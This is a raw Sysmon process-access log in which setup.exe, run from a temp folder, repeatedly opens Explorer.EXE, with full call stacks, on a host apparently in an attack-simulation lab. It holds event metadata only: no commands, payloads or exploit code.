13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3eaa(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
